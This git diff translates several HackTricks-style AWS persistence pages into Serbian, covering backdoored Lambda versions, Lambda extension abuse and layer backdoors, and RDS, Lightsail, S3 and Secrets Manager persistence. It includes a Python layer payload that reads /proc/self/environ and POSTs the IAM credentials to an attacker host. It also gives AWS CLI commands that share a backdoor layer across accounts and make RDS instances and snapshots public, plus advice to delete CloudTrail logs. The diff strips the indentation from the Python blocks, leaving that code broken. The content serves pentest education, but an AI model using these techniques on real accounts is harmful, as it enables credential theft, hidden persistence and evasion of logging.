+### Verzija Backdoor + API Gateway
 
-1. Copy the original code of the Lambda
-2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST
-   1. Call the API gateway related to the lambda to execute the code
-3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST.
-   1. This will hide the backdoored code in a previous version
-4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1`
-   1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario).
-5. Select the POST method created and in Actions select **`Deploy API`**
-6. Now, when you **call the function via POST your Backdoor** will be invoked
+1. Kopirajte originalni kod Lambde
+2. **Kreirajte novu verziju sa backdoor-om** originalnog koda (ili samo sa malicioznim kodom). Objavite i **implementirajte tu verziju** na $LATEST
+1. Pozovite API gateway povezan sa lambdom da izvrši kod
+3. **Kreirajte novu verziju sa originalnim kodom**, objavite i implementirajte tu **verziju** na $LATEST.
+1. Ovo će sakriti backdoored kod u prethodnoj verziji
+4. Idite na API Gateway i **kreirajte novu POST metodu** (ili izaberite bilo koju drugu metodu) koja će izvršiti backdoored verziju lambde: `arn:aws:lambda:us-east-1::function::1`
+1. Obratite pažnju na završni :1 u arn **koji označava verziju funkcije** (verzija 1 će biti backdoored u ovom scenariju).
+5. Izaberite kreiranu POST metodu i u Akcijama izaberite **`Deploy API`**
+6. Sada, kada **pozovete funkciju putem POST-a vaš Backdoor** će biti aktiviran
 
 ### Cron/Event actuator
 
-The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\
-Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**.
+Činjenica da možete **izvršavati lambda funkcije kada se nešto desi ili kada prođe određeno vreme** čini lambdu lepim i uobičajenim načinom za postizanje persistencije i izbegavanje otkrivanja.\
+Evo nekoliko ideja kako da učinite svoju **prisutnost u AWS-u diskretnijom kreiranjem lambdi**.
 
-- Every time a new user is created lambda generates a new user key and send it to the attacker.
-- Every time a new role is created lambda gives assume role permissions to compromised users.
-- Every time new cloudtrail logs are generated, delete/alter them
+- Svaki put kada se kreira novi korisnik, lambda generiše novi korisnički ključ i šalje ga napadaču.
+- Svaki put kada se kreira nova uloga, lambda dodeljuje dozvole za preuzimanje uloge kompromitovanim korisnicima.
+- Svaki put kada se generišu novi cloudtrail logovi, obrišite/izmenite ih
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
index 71655ada0..3a2591d0d 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
@@ -4,35 +4,35 @@
 
 ## Lambda Extensions
 
-Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**.
+Lambda ekstenzije poboljšavaju funkcije integracijom sa raznim **alatima za praćenje, posmatranje, bezbednost i upravljanje**. Ove ekstenzije, dodate putem [.zip arhiva koristeći Lambda slojeve](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) ili uključene u [implementacije kontejnerskih slika](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), rade u dva režima: **interni** i **eksterni**.
 
-- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**.
-- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**.
+- **Interni ekstenzije** se spajaju sa procesom izvršavanja, manipulišući njegovim pokretanjem koristeći **promenljive okruženja specifične za jezik** i **wrapper skripte**. Ova prilagođavanja se primenjuju na niz izvršnih okruženja, uključujući **Java Correto 8 i 11, Node.js 10 i 12, i .NET Core 3.1**.
+- **Eksterni ekstenzije** rade kao odvojeni procesi, održavajući usklađenost sa životnim ciklusom Lambda funkcije. Kompatibilni su sa raznim izvršnim okruženjima kao što su **Node.js 10 i 12, Python 3.7 i 3.8, Ruby 2.5 i 2.7, Java Corretto 8 i 11, .NET Core 3.1**, i **prilagođena izvršna okruženja**.
 
-For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
+Za više informacija o [**kako lambda ekstenzije funkcionišu proverite dokumentaciju**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
 
-### External Extension for Persistence, Stealing Requests & modifying Requests
+### Eksterni Ekstenzija za Održavanje, Krađu Zahteva & Modifikovanje Zahteva
 
-This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
+Ovo je sažetak tehnike predložene u ovom postu: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
 
-It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process_vm_readv**” and “**process_vm_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapid’s heap memory, by design.**
+Otkriveno je da je podrazumevani Linux kernel u Lambda okruženju izvršavanja kompajliran sa “**process_vm_readv**” i “**process_vm_writev**” sistemskim pozivima. I svi procesi se izvršavaju sa istim korisničkim ID-jem, čak i novi proces kreiran za eksternu ekstenziju. **To znači da eksterni ekstenzija ima potpuni pristup za čitanje i pisanje u Rapidovu heap memoriju, po dizajnu.**
 
-Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request.
+Štaviše, dok Lambda ekstenzije imaju mogućnost da **pretplate na događaje invokacije**, AWS ne otkriva sirove podatke ovim ekstenzijama. Ovo osigurava da **ekstenzije ne mogu pristupiti osetljivim informacijama** koje se prenose putem HTTP zahteva.
 
-The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid.
+Init (Rapid) proces prati sve API zahteve na [http://127.0.0.1:9001](http://127.0.0.1:9001/) dok se Lambda ekstenzije inicijalizuju i izvršavaju pre nego što se izvrši bilo koji kod izvršavanja, ali nakon Rapida.
 
 
https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png

 
-The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions.
+Promenljiva **`AWS_LAMBDA_RUNTIME_API`** označava **IP** adresu i **broj** porta Rapid API-ju za **dečije procese izvršavanja** i dodatne ekstenzije.
 
 > [!WARNING]
-> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number.
+> Promenom **`AWS_LAMBDA_RUNTIME_API`** promenljive okruženja na **`port`** kojem imamo pristup, moguće je presresti sve akcije unutar Lambda izvršavanja (**man-in-the-middle**). Ovo je moguće jer ekstenzija radi sa istim privilegijama kao Rapid Init, a kernel sistema omogućava **modifikaciju memorije procesa**, omogućavajući promenu broja porta.
 
-Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment.
+Budući da **ekstenzije rade pre bilo kog koda izvršavanja**, modifikovanje promenljive okruženja će uticati na proces izvršavanja (npr. Python, Java, Node, Ruby) kada se pokrene. Štaviše, **ekstenzije učitane nakon** naše, koje se oslanjaju na ovu promenljivu, takođe će prolaziti kroz našu ekstenziju. Ova postavka bi mogla omogućiti malveru da potpuno zaobiđe bezbednosne mere ili ekstenzije za logovanje direktno unutar okruženja izvršavanja.
 
 
https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png

 
-The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**.
+Alat [**lambda-spy**](https://github.com/clearvector/lambda-spy) je kreiran da izvrši tu **memorijsku pisanje** i **ukrade osetljive informacije** iz lambda zahteva, drugih **ekstenzija** **zahteva** i čak **modifikuje ih**.
 
 ## References
 
@@ -40,7 +40,3 @@ The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created
 - [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
index f8a5e2868..e4254c8fe 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
@@ -4,79 +4,72 @@
 
 ## Lambda Layers
 
-A Lambda layer is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files.
+Lambda layer je .zip datoteka koja **može sadržati dodatni kod** ili drugi sadržaj. Layer može sadržati biblioteke, [prilagođeno vreme izvršavanja](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), podatke ili konfiguracione datoteke.
 
-It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment.
+Moguće je uključiti do **pet layera po funkciji**. Kada uključite layer u funkciju, **sadržaj se ekstraktuje u `/opt`** direktorijum u okruženju izvršavanja.
 
-By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version.
+Po **defaultu**, **layeri** koje kreirate su **privatni** za vaš AWS nalog. Možete odlučiti da **podelite** layer sa drugim nalozima ili da **napravite** layer **javnim**. Ako vaše funkcije koriste layer koji je objavio drugi nalog, vaše funkcije mogu **nastaviti da koriste verziju layera nakon što je obrisana, ili nakon što je vaša dozvola za pristup layeru opozvana**. Međutim, ne možete kreirati novu funkciju ili ažurirati funkcije koristeći obrisanu verziju layera.
 
-Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image.
+Funkcije koje su implementirane kao slika kontejnera ne koriste layer-e. Umesto toga, pakujete svoje omiljeno vreme izvršavanja, biblioteke i druge zavisnosti u sliku kontejnera kada gradite sliku.
 
 ### Python load path
 
-The load path that Python will use in lambda is the following:
-
+Putanja učitavanja koju će Python koristiti u lambda je sledeća:
 ```
 ['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages']
 ```
-
-Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`**
+Proverite kako **druga** i treća **pozicija** zauzimaju direktorijumi gde **lambda slojevi** raspakuju svoje datoteke: **`/opt/python/lib/python3.9/site-packages`** i **`/opt/python`**
 
 > [!CAUTION]
-> If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation.
+> Ako napadač uspe da **ubaci** **backdoor** u korišćeni lambda **sloj** ili **doda jedan** koji će **izvršavati proizvoljan kod kada se učita uobičajena biblioteka**, moći će da izvrši zlonamerni kod sa svakim pozivom lambda funkcije.
 
-Therefore, the requisites are:
+Stoga, zahtevi su:
 
-- **Check libraries** that are **loaded** by the victims code
-- Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library.
+- **Proverite biblioteke** koje su **učitane** kodom žrtve
+- Kreirajte **proxy biblioteku sa lambda slojevima** koja će **izvršavati prilagođeni kod** i **učitati originalnu** biblioteku.
 
-### Preloaded libraries
+### Učitane biblioteke
 
 > [!WARNING]
-> When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\
-> In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed.
-
-With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda:
+> Kada se zloupotrebljava ova tehnika, naišao sam na poteškoću: Neke biblioteke su **već učitane** u python runtime kada se vaš kod izvršava. Očekivao sam da pronađem stvari poput `os` ili `sys`, ali **čak je i `json` biblioteka bila učitana**.\
+> Da bi se zloupotrebila ova tehnika postojanosti, kod treba da **učita novu biblioteku koja nije učitana** kada se kod izvršava.
 
+Sa python kodom poput ovog moguće je dobiti **listu biblioteka koje su unapred učitane** unutar python runtime-a u lambda:
 ```python
 import sys
 
 def lambda_handler(event, context):
-    return {
-        'statusCode': 200,
-        'body': str(sys.modules.keys())
-    }
+return {
+'statusCode': 200,
+'body': str(sys.modules.keys())
+}
 ```
-
-And this is the **list** (check that libraries like `os` or `json` are already there)
-
+I ovo je **lista** (proverite da li su biblioteke kao što su `os` ili `json` već prisutne)
 ```
 'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function'
 ```
-
-And this is the list of **libraries** that **lambda includes installed by default**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
+I ovo je lista **biblioteka** koje **lambda uključuje instalirane po defaultu**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
 
 ### Lambda Layer Backdooring
 
-In this example lets suppose that the targeted code is importing **`csv`**. We are going to be **backdooring the import of the `csv` library**.
+U ovom primeru pretpostavimo da ciljani kod uvozi **`csv`**. Mi ćemo **napraviti backdoor za uvoz `csv` biblioteke**.
 
-For doing that, we are going to **create the directory csv** with the file **`__init__.py`** on it in a path that is loaded by lambda: **`/opt/python/lib/python3.9/site-packages`**\
-Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\
-This file must:
+Da bismo to uradili, kreiraćemo **direktorijum csv** sa fajlom **`__init__.py`** u njemu na putanji koja se učitava od strane lambda: **`/opt/python/lib/python3.9/site-packages`**\
+Zatim, kada se lambda izvrši i pokuša da učita **csv**, naš **`__init__.py` fajl će biti učitan i izvršen**.\
+Ovaj fajl mora:
 
-- Execute our payload
-- Load the original csv library
-
-We can do both with:
+- Izvršiti naš payload
+- Učitati originalnu csv biblioteku
 
+Možemo uraditi oboje sa:
 ```python
 import sys
 from urllib import request
 
 with open("/proc/self/environ", "rb") as file:
-    url= "https://attacker13123344.com/" #Change this to your server
-    req = request.Request(url, data=file.read(), method="POST")
-    response = request.urlopen(req)
+url= "https://attacker13123344.com/" #Change this to your server
+req = request.Request(url, data=file.read(), method="POST")
+response = request.urlopen(req)
 
 # Remove backdoor directory from path to load original library
 del_path_dir = "/".join(__file__.split("/")[:-2])
@@ -90,29 +83,27 @@ import csv as _csv
 
 sys.modules["csv"] = _csv
 ```
+Zatim, kreirajte zip sa ovim kodom na putanji **`python/lib/python3.9/site-packages/__init__.py`** i dodajte ga kao lambda layer.
 
-Then, create a zip with this code in the path **`python/lib/python3.9/site-packages/__init__.py`** and add it as a lambda layer.
+Ovaj kod možete pronaći na [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor)
 
-You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor)
-
-The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated:
+Integrisani payload će **poslati IAM kredencijale na server PRVI PUT kada se pozove ili NAKON resetovanja lambda kontejnera** (promena koda ili hladna lambda), ali **druge tehnike** kao što su sledeće takođe mogu biti integrisane:
 
 {{#ref}}
 ../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
 {{#endref}}
 
-### External Layers
+### Eksterni Layeri
 
-Note that it's possible to use **lambda layers from external accounts**. Moreover, a lambda can use a layer from an external account even if it doesn't have permissions.\
-Also note that the **max number of layers a lambda can have is 5**.
+Napomena da je moguće koristiti **lambda layer-e iz eksternih naloga**. Štaviše, lambda može koristiti layer iz eksternog naloga čak i ako nema dozvole.\
+Takođe, napomena da je **maksimalan broj layer-a koje lambda može imati 5**.
 
-Therefore, in order to improve the versatility of this technique an attacker could:
-
-- Backdoor an existing layer of the user (nothing is external)
-- **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**.
-  - The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda)
-  - The victim **won't see external layers** used with **`aws lambda list-layers`**
+Stoga, kako bi poboljšao svestranost ove tehnike, napadač bi mogao:
 
+- Backdoor-ovati postojeći layer korisnika (ništa nije eksterno)
+- **Kreirati** **layer** u **svojim nalogu**, dati **nalogu žrtve pristup** da koristi layer, **konfigurisati** **layer** u Lambda žrtve i **ukloniti dozvolu**.
+- **Lambda** će i dalje moći da **koristi layer** i **žrtva neće** imati lak način da **preuzme kod layer-a** (osim ako ne dobije rev shell unutar lambda)
+- Žrtva **neće videti eksterne layer-e** korišćene sa **`aws lambda list-layers`**
 ```bash
 # Upload backdoor layer
 aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
@@ -126,9 +117,4 @@ aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statemen
 # Remove permissions
 aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1
 ```
-
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
index 88b0d082a..21e62d742 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
@@ -4,34 +4,30 @@
 
 ## Lightsail
 
-For more information check:
+Za više informacija proverite:
 
 {{#ref}}
 ../aws-services/aws-lightsail-enum.md
 {{#endref}}
 
-### Download Instance SSH keys & DB passwords
+### Preuzmite SSH ključeve instance i lozinke za DB
 
-They won't be changed probably so just having them is a good option for persistence
+Verovatno se neće promeniti, tako da ih imati je dobra opcija za postojanost
 
-### Backdoor Instances
+### Backdoor instance
 
-An attacker could get access to the instances and backdoor them:
+Napadač bi mogao dobiti pristup instancama i postaviti backdoor:
 
-- Using a traditional **rootkit** for example
-- Adding a new **public SSH key**
-- Expose a port with port knocking with a backdoor
+- Koristeći tradicionalni **rootkit** na primer
+- Dodajući novi **javnu SSH ključ**
+- Izlaganje porta sa port knocking uz backdoor
 
-### DNS persistence
+### DNS postojanost
 
-If domains are configured:
+Ako su domeni konfigurisani:
 
-- Create a subdomain pointing your IP so you will have a **subdomain takeover**
-- Create **SPF** record allowing you to send **emails** from the domain
-- Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones
+- Kreirajte poddomen koji usmerava na vašu IP adresu kako biste imali **preuzimanje poddomena**
+- Kreirajte **SPF** zapis koji vam omogućava da šaljete **emailove** sa domena
+- Konfigurišite **glavnu IP adresu domena na svoju** i izvršite **MitM** od vaše IP adrese do legitimnih
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
index b7a4b8f7b..5643fbe36 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
@@ -1,35 +1,27 @@
-# AWS - RDS Persistence
+# AWS - RDS Persistencija
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## RDS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-relational-database-rds-enum.md
 {{#endref}}
 
-### Make instance publicly accessible: `rds:ModifyDBInstance`
-
-An attacker with this permission can **modify an existing RDS instance to enable public accessibility**.
+### Omogućite javni pristup instanci: `rds:ModifyDBInstance`
 
+Napadač sa ovom dozvolom može **modifikovati postojeću RDS instancu kako bi omogućio javni pristup**.
 ```bash
 aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
 ```
+### Kreirajte admin korisnika unutar DB
 
-### Create an admin user inside the DB
-
-An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database.
-
-### Make snapshot public
+Napadač može jednostavno **napraviti korisnika unutar DB** tako da čak i ako se lozinka glavnog korisnika promeni, on **ne gubi pristup** bazi podataka.
 
+### Učinite snimak javnim
 ```bash
 aws rds modify-db-snapshot-attribute --db-snapshot-identifier  --attribute-name restore --values-to-add all
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
index f2c4ce048..e197d2916 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
@@ -4,26 +4,22 @@
 
 ## S3
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-s3-athena-and-glacier-enum.md
 {{#endref}}
 
-### KMS Client-Side Encryption
+### KMS Klijentska Enkripcija
 
-When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again:
+Kada je proces enkripcije završen, korisnik će koristiti KMS API da generiše novi ključ (`aws kms generate-data-key`) i on će **sacuvati generisani enkriptovani ključ unutar metapodataka** datoteke ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) tako da kada dođe do dekripcije, može ponovo da ga dekriptuje koristeći KMS:
 
 

 
-Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it.
+Stoga, napadač bi mogao da dobije ovaj ključ iz metapodataka i dekriptuje sa KMS (`aws kms decrypt`) da bi dobio ključ koji je korišćen za enkripciju informacija. Na ovaj način, napadač će imati ključ za enkripciju i ako se taj ključ ponovo koristi za enkripciju drugih datoteka, moći će da ga iskoristi.
 
-### Using S3 ACLs
+### Korišćenje S3 ACL-a
 
-Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket.
+Iako su obično ACL-ovi kanti onemogućeni, napadač sa dovoljno privilegija mogao bi da ih zloupotrebi (ako su omogućeni ili ako napadač može da ih omogući) da zadrži pristup S3 kanti.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
index c15f27003..02c9062ab 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
@@ -1,57 +1,51 @@
-# AWS - Secrets Manager Persistence
+# AWS - Održavanje u Secrets Manager-u
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Secrets Manager
 
-For more info check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-secrets-manager-enum.md
 {{#endref}}
 
-### Via Resource Policies
+### Putem politika resursa
 
-It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**.
+Moguće je **dodeliti pristup tajnama spoljnim nalozima** putem politika resursa. Pogledajte [**stranicu o Privesc-u za Secrets Manager**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) za više informacija. Imajte na umu da da bi **pristupio tajni**, spoljni nalog će takođe **morati da ima pristup KMS ključu koji enkriptuje tajnu**.
 
-### Via Secrets Rotate Lambda
+### Putem Lambda funkcije za rotaciju tajni
 
-To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself.
-
-This is how lambda code for such action could look like:
+Da bi se **automatski rotirale tajne**, poziva se konfigurisana **Lambda**. Ako bi napadač mogao da **izmeni** **kod**, mogao bi direktno da **izvuče novu tajnu** za sebe.
 
+Ovako bi kod lambda funkcije za takvu akciju mogao izgledati:
 ```python
 import boto3
 
 def rotate_secrets(event, context):
-    # Create a Secrets Manager client
-    client = boto3.client('secretsmanager')
+# Create a Secrets Manager client
+client = boto3.client('secretsmanager')
 
-    # Retrieve the current secret value
-    secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
+# Retrieve the current secret value
+secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
 
-    # Rotate the secret by updating its value
-    new_secret_value = rotate_secret(secret_value)
-    client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
+# Rotate the secret by updating its value
+new_secret_value = rotate_secret(secret_value)
+client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
 
 def rotate_secret(secret_value):
-    # Perform the rotation logic here, e.g., generate a new password
+# Perform the rotation logic here, e.g., generate a new password
 
-    # Example: Generate a new password
-    new_secret_value = generate_password()
+# Example: Generate a new password
+new_secret_value = generate_password()
 
-    return new_secret_value
+return new_secret_value
 
 def generate_password():
-    # Example: Generate a random password using the secrets module
-    import secrets
-    import string
-    password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
-    return password
+# Example: Generate a random password using the secrets module
+import secrets
+import string
+password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
+return password
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
index 8e97cc81c..8f8875482 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
